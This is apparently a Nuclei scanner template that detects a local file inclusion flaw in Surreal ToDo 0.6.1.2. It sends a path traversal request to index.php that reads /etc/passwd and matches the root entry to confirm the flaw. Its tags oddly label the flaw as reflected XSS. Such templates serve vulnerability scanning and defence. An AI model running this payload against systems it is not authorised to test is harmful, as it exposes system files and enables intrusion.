nuclei-templates/vulnerabilities/other/surrealtodo-lfi.yaml

27 lines
602 B
YAML
Raw Normal View History

2022-07-20 17:44:17 +00:00
id: surrealtodo-lfi
info:
name: Surreal ToDo 0.6.1.2 - Local File Inclusion
author: arafatansari
severity: medium
reference:
- https://www.exploit-db.com/exploits/45826
description: |
Surreal ToDo is affected by Local File Inclusion on index.php via content parameter.
tags: xss,unauthenticated,cms,reflected
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?content=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200